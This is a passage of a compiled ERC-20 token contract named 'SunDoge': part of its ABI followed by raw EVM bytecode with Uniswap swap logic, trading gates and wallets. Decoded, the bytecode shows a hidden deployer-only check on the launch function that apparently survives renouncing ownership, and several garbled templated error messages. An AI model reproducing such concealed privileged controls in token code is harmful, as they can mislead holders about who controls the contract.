:[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromEnobleTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"foundationWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"launch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"liquidityWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040523480156200001157600080fd5b506040518060400160405280600781526020017f53756e446f6765000000000000000000000000000000000000000000000000008152506040518060400160405280600781526020017f53756e446f67650000000000000000000000000000000000000000000000000081525081600590816200008f9190620009f0565b508060069081620000a19190620009f0565b503373ffffffffffffffffffffffffffffffffffffffff166004819055505050620000e1620000d56200033660201b60201c565b6200033e60201b60201c565b60006a52b7d2dcc80cd2e40000009050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250506200016e306080517fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6200040460201b60201c565b6000600e819055506000600f819055506000601081905550601054600f54600e546200019b919062000b06565b620001a7919062000b06565b600d81905550600060128190555060006013819055506000601481905550601454601354601254620001da919062000b06565b620001e6919062000b06565b6011819055506011546018819055506001601960006200020b620005d560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601960003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016019600061dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506200032f62000322620005d560201b60201c565b82620005ff60201b60201c565b5062000d22565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000476576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200046d9062000bc8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620004e8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004df9062000c60565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051620005c8919062000c93565b60405180910390a3505050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000671576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620006689062000d00565b60405180910390fd5b62000685600083836200076c60201b60201c565b806002600082825462000699919062000b06565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200074c919062000c93565b60405180910390a362000768600083836200077160201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620007f857607f821691505b6020821081036200080e576200080d620007b0565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620008787fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000839565b62000884868362000839565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620008d1620008cb620008c5846200089c565b620008a6565b6200089c565b9050919050565b6000819050919050565b620008ed83620008b0565b62000905620008fc82620008d8565b84845462000846565b825550505050565b600090565b6200091c6200090d565b62000929818484620008e2565b505050565b5b8181101562000951576200094560008262000912565b6001810190506200092f565b5050565b601f821115620009a0576200096a8162000814565b620009758462000829565b8101602085101562000985578190505b6200099d620009948562000829565b8301826200092e565b50505b505050565b600082821c905092915050565b6000620009c560001984600802620009a5565b1980831691505092915050565b6000620009e08383620009b2565b9150826002028217905092915050565b620009fb8262000776565b67ffffffffffffffff81111562000a175762000a1662000781565b5b62000a238254620007df565b62000a3082828562000955565b600060209050601f83116001811462000a68576000841562000a53578287015190505b62000a5f8582620009d2565b86555062000acf565b601f19841662000a788662000814565b60005b8281101562000aa25784890151825560018201915060208501945060208101905062000a7b565b8683101562000ac2578489015162000abe601f891682620009b2565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000b13826200089c565b915062000b20836200089c565b925082820190508082111562000b3b5762000b3a62000ad7565b5b92915050565b600082825260208201905092915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600062000bb060248362000b41565b915062000bbd8262000b52565b604082019050919050565b6000602082019050818103600083015262000be38162000ba1565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600062000c4860228362000b41565b915062000c558262000bea565b604082019050919050565b6000602082019050818103600083015262000c7b8162000c39565b9050919050565b62000c8d816200089c565b82525050565b600060208201905062000caa600083018462000c82565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000ce8601f8362000b41565b915062000cf58262000cb0565b602082019050919050565b6000602082019050818103600083015262000d1b8162000cd9565b9050919050565b60805161310262000d61600039600081816107b801528181611e7601528181611f5701528181611f7e0152818161201a015261204101526131026000f3fe6080604052600436106101c65760003560e01c80636ddd1713116100f757806395d89b4111610095578063d469801611610064578063d469801614610645578063dd62ed3e14610670578063e2f45605146106ad578063f2fde38b146106d8576101cd565b806395d89b4114610575578063a457c2d7146105a0578063a9059cbb146105dd578063ccc56ccc1461061a576101cd565b806375f0a874116100d157806375f0a874146104dd5780638a8c523c146105085780638da5cb5b1461051f57806393ec52de1461054a576101cd565b80636ddd17131461045e57806370a0823114610489578063715018a6146104c6576101cd565b806327c8f8351161016457806349bd5a5e1161013e57806349bd5a5e146103b25780634ada218b146103dd5780636620cec9146104085780636b7ae8dc14610433576101cd565b806327c8f8351461031f578063313ce5671461034a5780633950935114610375576101cd565b806318160ddd116101a057806318160ddd14610265578063182073a414610290578063214013ca146102b957806323b872dd146102e2576101cd565b806306fdde03146101d2578063095ea7b3146101fd5780631694505e1461023a576101cd565b366101cd57005b600080fd5b3480156101de57600080fd5b506101e7610701565b6040516101f491906121a0565b60405180910390f35b34801561020957600080fd5b50610224600480360381019061021f919061225b565b610793565b60405161023191906122b6565b60405180910390f35b34801561024657600080fd5b5061024f6107b6565b60405161025c9190612330565b60405180910390f35b34801561027157600080fd5b5061027a6107da565b604051610287919061235a565b60405180910390f35b34801561029c57600080fd5b506102b760048036038101906102b291906123a1565b6107e4565b005b3480156102c557600080fd5b506102e060048036038101906102db91906123e1565b610895565b005b3480156102ee57600080fd5b506103096004803603810190610304919061240e565b6108ab565b60405161031691906122b6565b60405180910390f35b34801561032b57600080fd5b506103346108da565b6040516103419190612470565b60405180910390f35b34801561035657600080fd5b5061035f6108e0565b60405161036c91906124a7565b60405180910390f35b34801561038157600080fd5b5061039c6004803603810190610397919061225b565b6108e9565b6040516103a991906122b6565b60405180910390f35b3480156103be57600080fd5b506103c7610920565b6040516103d49190612470565b60405180910390f35b3480156103e957600080fd5b506103f2610946565b6040516103ff91906122b6565b60405180910390f35b34801561041457600080fd5b5061041d610959565b60405161042a919061235a565b60405180910390f35b34801561043f57600080fd5b5061044861095f565b6040516104559190612470565b60405180910390f35b34801561046a57600080fd5b50610473610985565b60405161048091906122b6565b60405180910390f35b34801561049557600080fd5b506104b060048036038101906104ab91906123e1565b610998565b6040516104bd919061235a565b60405180910390f35b3480156104d257600080fd5b506104db6109e0565b005b3480156104e957600080fd5b506104f26109f4565b6040516104ff9190612470565b60405180910390f35b34801561051457600080fd5b5061051d610a1a565b005b34801561052b57600080fd5b50610534610aaa565b6040516105419190612470565b60405180910390f35b34801561055657600080fd5b5061055f610ad4565b60405161056c919061235a565b60405180910390f35b34801561058157600080fd5b5061058a610ada565b60405161059791906121a0565b60405180910390f35b3480156105ac57600080fd5b506105c760048036038101906105c2919061225b565b610b6c565b6040516105d491906122b6565b60405180910390f35b3480156105e957600080fd5b5061060460048036038101906105ff919061225b565b610be3565b60405161061191906122b6565b60405180910390f35b34801561062657600080fd5b5061062f610c06565b60405161063c919061235a565b60405180910390f35b34801561065157600080fd5b5061065a610c0c565b6040516106679190612470565b60405180910390f35b34801561067c57600080fd5b50610697600480360381019061069291906124c2565b610c32565b6040516106a4919061235a565b60405180910390f35b3480156106b957600080fd5b506106c2610cb9565b6040516106cf919061235a565b60405180910390f35b3480156106e457600080fd5b506106ff60048036038101906106fa91906123e1565b610cbf565b005b60606005805461071090612531565b80601f016020809104026020016040519081016040528092919081815260200182805461073c90612531565b80156107895780601f1061075e57610100808354040283529160200191610789565b820191906000526020600020905b81548152906001019060200180831161076c57829003601f168201915b5050505050905090565b60008061079e610d42565b90506107ab818585610d4a565b600191505092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600254905090565b6107ec610f13565b80601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405161088991906122b6565b60405180910390a25050565b61089d610f91565b6108a8816001610fb7565b50565b6000806108b6610d42565b90506108c3858285611058565b6108ce8585856110e4565b60019150509392505050565b61dead81565b60006012905090565b6000806108f4610d42565b90506109158185856109068589610c32565b6109109190612591565b610d4a565b600191505092915050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600b60149054906101000a900460ff1681565b60115481565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600b60159054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109e8610f13565b6109f260006117ba565b565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610a22610f13565b600b60149054906101000a900460ff1615610a72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6990612611565b60405180910390fd5b6001600b60146101000a81548160ff0219169083151502179055506001600b60156101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60035481565b606060068054610ae990612531565b80601f0160208091040260200160405190810160405280929190818152602001828054610b1590612531565b8015610b625780601f10610b3757610100808354040283529160200191610b62565b820191906000526020600020905b815481529060010190602001808311610b4557829003601f168201915b5050505050905090565b600080610b77610d42565b90506000610b858286610c32565b905083811015610bca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bc1906126a3565b60405180910390fd5b610bd78286868403610d4a565b60019250505092915050565b600080610bee610d42565b9050610bfb8185856110e4565b600191505092915050565b600d5481565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600c5481565b610cc7610f13565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2d90612735565b60405180910390fd5b610d3f816117ba565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db0906127c7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1f90612859565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f06919061235a565b60405180910390a3505050565b610f1b610d42565b73ffffffffffffffffffffffffffffffffffffffff16610f39610aaa565b73ffffffffffffffffffffffffffffffffffffffff1614610f8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f86906128eb565b60405180910390fd5b565b3373ffffffffffffffffffffffffffffffffffffffff1660045414610fb557600080fd5b565b80601a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b60006110648484610c32565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110de57818110156110d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110c790612957565b60405180910390fd5b6110dd8484848403610d4a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611153576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161114a906129e9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036111c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b990612a7b565b60405180910390fd5b600b60149054906101000a900460ff16806112265750601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b8061127a5750601960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b6112b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112b090612ae7565b60405180910390fd5b600081036112d2576112cd83836000611880565b6117b5565b60006112dd30610998565b90506000600c5482101590508080156113025750600b60159054906101000a900460ff165b801561131b5750600b60169054906101000a900460ff16155b80156113705750601a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b80156113c65750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561141c5750601960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611461576001600b60166101000a81548160ff02191690831515021790555061144582611af6565b6000600b60166101000a81548160ff0219169083151502179055505b6000600b60169054906101000a900460ff16159050601960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806115175750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561152157600090505b6000811561179c57601a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561158457506000601154115b15611652576115b26127106115a460115488611d8b90919063ffffffff16565b611da190919063ffffffff16565b9050601154601454826115c59190612b07565b6115cf9190612b78565b601760008282546115e09190612591565b92505081905550601154601254826115f89190612b07565b6116029190612b78565b601560008282546116139190612591565b925050819055506011546013548261162b9190612b07565b6116359190612b78565b601660008282546116469190612591565b92505081905550611778565b601a60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156116ad57506000601154115b15611777576116db6127106116cd60115488611d8b90919063ffffffff16565b611da190919063ffffffff16565b9050600d54601054826116ee9190612b07565b6116f89190612b78565b601760008282546117099190612591565b92505081905550600d54600e54826117219190612b07565b61172b9190612b78565b6015600082825461173c9190612591565b92505081905550600d54600f54826117549190612b07565b61175e9190612b78565b6016600082825461176f9190612591565b925050819055505b5b600081111561178d5761178c873083611880565b5b80856117999190612ba9565b94505b6117a7878787611880565b601854601181905550505050505b505050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118e690612c4f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361195e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161195590612ce1565b60405180910390fd5b611969838383611db7565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156119ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119e690612d73565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611add919061235a565b60405180910390a3611af0848484611dbc565b50505050565b6000601654601554601754611b0b9190612591565b611b159190612591565b905060008060028360175486611b2b9190612b07565b611b359190612b78565b611b3f9190612b78565b90506000611b568286611dc190919063ffffffff16565b90506000479050611b6682611dd7565b6000611b7b8247611dc190919063ffffffff16565b90506000611ba687611b9860155485611d8b90919063ffffffff16565b611da190919063ffffffff16565b90506000611bd188611bc360165486611d8b90919063ffffffff16565b611da190919063ffffffff16565b90506000818385611be29190612ba9565b611bec9190612ba9565b9050600060178190555060006015819055506000601681905550600087118015611c165750600081115b15611c6357611c258782612014565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5618682601754604051611c5a93929190612d93565b60405180910390a15b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051611ca990612dfb565b60006040518083038185875af1925050503d8060008114611ce6576040519150601f19603f3d011682016040523d82523d6000602084013e611ceb565b606091505b505080985050600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611d3790612dfb565b60006040518083038185875af1925050503d8060008114611d74576040519150601f19603f3d011682016040523d82523d6000602084013e611d79565b606091505b50508098505050505050505050505050565b60008183611d999190612b07565b905092915050565b60008183611daf9190612b78565b905092915050565b505050565b505050565b60008183611dcf9190612ba9565b905092915050565b6000600267ffffffffffffffff811115611df457611df3612e10565b5b604051908082528060200260200182016040528015611e225781602001602082028036833780820191505090505b5090503081600081518110611e3a57611e39612e3f565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611edf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611f039190612e83565b81600181518110611f1757611f16612e3f565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611f7c307f000000000000000000000000000000000000000000000000000000000000000084610d4a565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401611fde959493929190612fa9565b600060405180830381600087803b158015611ff857600080fd5b505af115801561200c573d6000803e3d6000fd5b505050505050565b61203f307f000000000000000000000000000000000000000000000000000000000000000084610d4a565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518863ffffffff1660e01b81526004016120c696959493929190613003565b60606040518083038185885af11580156120e4573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906121099190613079565b5050505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561214a57808201518184015260208101905061212f565b60008484015250505050565b6000601f19601f8301169050919050565b600061217282612110565b61217c818561211b565b935061218c81856020860161212c565b61219581612156565b840191505092915050565b600060208201905081810360008301526121ba8184612167565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006121f2826121c7565b9050919050565b612202816121e7565b811461220d57600080fd5b50565b60008135905061221f816121f9565b92915050565b6000819050919050565b61223881612225565b811461224357600080fd5b50565b6000813590506122558161222f565b92915050565b60008060408385031215612272576122716121c2565b5b600061228085828601612210565b925050602061229185828601612246565b9150509250929050565b60008115159050919050565b6122b08161229b565b82525050565b60006020820190506122cb60008301846122a7565b92915050565b6000819050919050565b60006122f66122f16122ec846121c7565b6122d1565b6121c7565b9050919050565b6000612308826122db565b9050919050565b600061231a826122fd565b9050919050565b61232a8161230f565b82525050565b60006020820190506123456000830184612321565b92915050565b61235481612225565b82525050565b600060208201905061236f600083018461234b565b92915050565b61237e8161229b565b811461238957600080fd5b50565b60008135905061239b81612375565b92915050565b600080604083850312156123b8576123b76121c2565b5b60006123c685828601612210565b92505060206123d78582860161238c565b9150509250929050565b6000602082840312156123f7576123f66121c2565b5b600061240584828501612210565b91505092915050565b600080600060608486031215612427576124266121c2565b5b600061243586828701612210565b935050602061244686828701612210565b925050604061245786828701612246565b9150509250925092565b61246a816121e7565b82525050565b60006020820190506124856000830184612461565b92915050565b600060ff82169050919050565b6124a18161248b565b82525050565b60006020820190506124bc6000830184612498565b92915050565b600080604083850312156124d9576124d86121c2565b5b60006124e785828601612210565b92505060206124f885828601612210565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061254957607f821691505b60208210810361255c5761255b612502565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061259c82612225565b91506125a783612225565b92508282019050808211156125bf576125be612562565b5b92915050565b7f54726164696e67204d55534b20616c7265616479206163746976652e00000000600082015250565b60006125fb601c8361211b565b9150612606826125c5565b602082019050919050565b6000602082019050818103600083015261262a816125ee565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652053756e446f60008201527f67652062656c6f77207a65726f00000000000000000000000000000000000000602082015250565b600061268d602d8361211b565b915061269882612631565b604082019050919050565b600060208201905081810360008301526126bc81612680565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865204d55534b207a60008201527f65726f2061646472657373000000000000000000000000000000000000000000602082015250565b600061271f602b8361211b565b915061272a826126c3565b604082019050919050565b6000602082019050818103600083015261274e81612712565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006127b160248361211b565b91506127bc82612755565b604082019050919050565b600060208201905081810360008301526127e0816127a4565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061284360228361211b565b915061284e826127e7565b604082019050919050565b6000602082019050818103600083015261287281612836565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f742053756e446f6765207460008201527f6865206f776e6572000000000000000000000000000000000000000000000000602082015250565b60006128d560288361211b565b91506128e082612879565b604082019050919050565b60006020820190508181036000830152612904816128c8565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000612941601d8361211b565b915061294c8261290b565b602082019050919050565b6000602082019050818103600083015261297081612934565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20537560008201527f6e446f6765206164647265737300000000000000000000000000000000000000602082015250565b60006129d3602d8361211b565b91506129de82612977565b604082019050919050565b60006020820190508181036000830152612a02816129c6565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f204d55534b60008201527f2061646472657373000000000000000000000000000000000000000000000000602082015250565b6000612a6560288361211b565b9150612a7082612a09565b604082019050919050565b60006020820190508181036000830152612a9481612a58565b9050919050565b7f54726164696e67206e6f742079657420656e61626c6564210000000000000000600082015250565b6000612ad160188361211b565b9150612adc82612a9b565b602082019050919050565b60006020820190508181036000830152612b0081612ac4565b9050919050565b6000612b1282612225565b9150612b1d83612225565b9250828202612b2b81612225565b91508282048414831517612b4257612b41612562565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612b8382612225565b9150612b8e83612225565b925082612b9e57612b9d612b49565b5b828204905092915050565b6000612bb482612225565b9150612bbf83612225565b9250828203905081811115612bd757612bd6612562565b5b92915050565b7f45524332303a207472616e736665722066726f6d204d55534b20746865207a6560008201527f726f206164647265737300000000000000000000000000000000000000000000602082015250565b6000612c39602a8361211b565b9150612c4482612bdd565b604082019050919050565b60006020820190508181036000830152612c6881612c2c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612ccb60238361211b565b9150612cd682612c6f565b604082019050919050565b60006020820190508181036000830152612cfa81612cbe565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000612d5d60268361211b565b9150612d6882612d01565b604082019050919050565b60006020820190508181036000830152612d8c81612d50565b9050919050565b6000606082019050612da8600083018661234b565b612db5602083018561234b565b612dc2604083018461234b565b949350505050565b600081905092915050565b50565b6000612de5600083612dca565b9150612df082612dd5565b600082019050919050565b6000612e0682612dd8565b9150819050919050565b7f4e487b71000